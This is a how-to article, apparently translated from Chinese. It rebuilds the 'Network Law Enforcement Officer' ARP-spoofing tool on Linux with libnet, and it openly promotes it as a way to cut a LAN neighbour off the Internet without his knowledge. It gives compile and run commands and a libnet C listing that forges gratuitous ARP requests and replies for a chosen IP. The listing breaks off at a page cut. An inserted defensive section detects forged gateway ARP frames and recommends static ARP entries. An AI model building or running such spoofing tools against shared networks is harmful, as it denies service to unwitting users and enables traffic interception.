Article title: Use libnet to implement "network law enforcement officer" on Linux.
Back in my student days there was a Windows network program called "Network Law Enforcement Officer". I believe many of my friends have used it. I would find that web pages would not open because someone on the LAN was running BT, and telling him directly risked offending him. What to do? Open Network Law Enforcement Officer, configure it briefly, and he could no longer access the Internet.
Of course, the current version of Network Law Enforcement Officer has many more features, but its principle is still the same as before: ARP spoofing. You fill in the gateway address to be forged, the tool then broadcasts gratuitous ARP packets on the LAN, and the other machines can no longer reach the Internet. In one sentence: very strong, very violent!
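Seen from the defender's side, the forged gateway announcements described above can be recognised on the wire. The following C routine is an added example, not code from the original article: the gateway address, the MAC addresses and the sample frame are constructed, and the names `classify_frame` and `verdict` are this example's own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum verdict { NOT_ARP, ARP_OK, GARP_OK, GATEWAY_SPOOF };

/* Constructed sample data: gateway 192.168.1.1 and its real MAC (assumed known). */
static const uint8_t GW_IP[4]  = {192, 168, 1, 1};
static const uint8_t GW_MAC[6] = {0x00, 0x11, 0x22, 0x33, 0x44, 0x55};
/* Constructed frame: broadcast gratuitous ARP request for 192.168.1.1 whose
 * sender MAC 02:aa:bb:cc:dd:ee is not the gateway's. */
static const uint8_t SAMPLE[42] = {
    0xff,0xff,0xff,0xff,0xff,0xff, 0x02,0xaa,0xbb,0xcc,0xdd,0xee, 0x08,0x06,
    0x00,0x01, 0x08,0x00, 6, 4, 0x00,0x01,          /* htype ptype hlen plen op */
    0x02,0xaa,0xbb,0xcc,0xdd,0xee, 192,168,1,1,     /* sender MAC, sender IP */
    0x00,0x00,0x00,0x00,0x00,0x00, 192,168,1,1      /* target MAC, target IP */
};

/* Classify one raw Ethernet frame against the known gateway IP/MAC binding. */
static enum verdict classify_frame(const uint8_t *f, size_t len,
                                   const uint8_t gw_ip[4], const uint8_t gw_mac[6])
{
    static const uint8_t ipv4_ether[6] = {0x00, 0x01, 0x08, 0x00, 6, 4};
    const uint8_t *arp, *sha, *spa, *tpa;

    if (len < 14 + 28 || f[12] != 0x08 || f[13] != 0x06)
        return NOT_ARP;                     /* too short, or EtherType != 0x0806 */
    arp = f + 14;
    if (memcmp(arp, ipv4_ether, 6) != 0)
        return NOT_ARP;                     /* not an Ethernet/IPv4 ARP body */
    sha = arp + 8; spa = arp + 14; tpa = arp + 24;

    /* Any ARP that binds the gateway IP to a different MAC is a spoof. */
    if (memcmp(spa, gw_ip, 4) == 0 && memcmp(sha, gw_mac, 6) != 0)
        return GATEWAY_SPOOF;
    /* Gratuitous ARP: sender IP equals target IP. */
    return memcmp(spa, tpa, 4) == 0 ? GARP_OK : ARP_OK;
}

int main(void)
{
    static const char *names[] = {"NOT_ARP", "ARP_OK", "GARP_OK", "GATEWAY_SPOOF"};
    printf("%s\n", names[classify_frame(SAMPLE, sizeof SAMPLE, GW_IP, GW_MAC)]);
    return 0;
}
```

Fed from a capture loop, a GATEWAY_SPOOF verdict exposes the sender MAC of the machine issuing the forged announcements. A static ARP entry for the gateway on each host keeps such frames from overwriting the real binding.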
On Linux, the ARP frames have to be constructed directly. Doing that with other techniques is quite complicated, but with libnet, an open-source library, the core code can be completed in a few dozen lines.
Most Linux distributions and other Unix systems ship libnet. Check whether your system has the libnet-config command.
If not, you can download libnet from its home page and install it:
http://www.packetfactory.net/libnet
In addition, check whether your system has version 1.1 or 1.0. The APIs of the two versions are very different. Here we use the latest version, 1.1; if you have 1.0, please upgrade.
Compile:
    gcc garp.c -o garp -lnet
Run:
-h: view the command-line help,
-f: specifies the output interface. If this parameter is not given, an interface is selected automatically,
-t: specifies the sending interval of the gratuitous ARP packets. The default value is 5 seconds,
Example:
    ./garp -f eth0 192.168.1.1 192.168.2.1
    /* Headers needed by the code shown on this page */
    #include <stdio.h>
    #include <stdint.h>
    #include <string.h>
    #include <netinet/in.h>
    #include <libnet.h>

    #define MAX_IP_NUM 32

    static char *pname = "";
    static char *ifname = NULL;
    static struct in_addr ipaddrs[MAX_IP_NUM];
    static int timer = 5;               /* seconds between sends */

    /* Copy the hardware (MAC) address of interface dev into macbuf. */
    static int
    get_hw_addr(char *dev, unsigned char macbuf[6])
    {
        libnet_t *l;
        char errbuf[LIBNET_ERRBUF_SIZE] = "";
        struct libnet_ether_addr *mac;

        l = libnet_init(LIBNET_LINK, dev, errbuf);
        if (!l) {
            fprintf(stderr, "libnet_init: %s\n", errbuf);
            return -1;
        }
        mac = libnet_get_hwaddr(l);
        if (!mac) {
            fprintf(stderr, "libnet_get_hwaddr: %s\n", libnet_geterror(l));
            libnet_destroy(l);
            return -1;
        }
        memcpy(macbuf, mac->ether_addr_octet, 6);
        libnet_destroy(l);
        return 0;
    }

    /*
     * Build gratuitous ARP frames for ipaddr on interface ifname: first a
     * request, then a reply. ipaddr is an IPv4 address in network byte
     * order; it is declared uint32_t (not long) so that exactly its four
     * address bytes are handed to libnet on 64-bit systems as well.
     */
    static int
    send_garp(char *ifname, uint32_t ipaddr)
    {
        unsigned char bcast_mac[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};
        unsigned char zero_mac[6] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
        unsigned char mymac[6] = {0x00};
        libnet_t *l;
        char errbuf[LIBNET_ERRBUF_SIZE] = "";
        int i, ret = 0;

        if (get_hw_addr(ifname, mymac) != 0) {
            return -1;
        }
        l = libnet_init(LIBNET_LINK, ifname, errbuf);
        if (!l) {
            fprintf(stderr, "libnet_init: %s\n", errbuf);
            return -1;
        }
        for (i = 0; i < 2; i++) {
            if (libnet_build_arp(ARPHRD_ETHER,  /* hardware address type */
                    ETHERTYPE_IP,               /* protocol address type */
                    6,                          /* hardware address length */
                    4,                          /* protocol address length */
                    (i == 0) ? ARPOP_REQUEST : ARPOP_REPLY, /* ARP operation type */
                    mymac,                      /* sender hardware address */
                    (unsigned char *)&ipaddr,   /* sender protocol address */
                    (i == 0) ? zero_mac : mymac, /* target hardware address */
                    (unsigned char *)&ipaddr,   /* target protocol address */
                    NULL,                       /* payload */
                    0,                          /* length of payload */
                    l,                          /* libnet context pointer */
                    0                           /* packet id */
                    ) == -1) {
                fprintf(stderr, "libnet_build_arp: %s\n", libnet_geterror(l));
                ret = -1;
                break;
            }
            /* Ethernet header: broadcast destination, our MAC as source */
            if (libnet_build_ethernet(bcast_mac, mymac, ETHERTYPE_ARP, NULL, 0,
                    l, 0) == -1) {
                fprintf(stderr, "libnet_build_ethernet: %s\n", libnet_geterror(l));
                ret = -1;
                break;
            }
            /* ... the listing continues on the next page of the original article */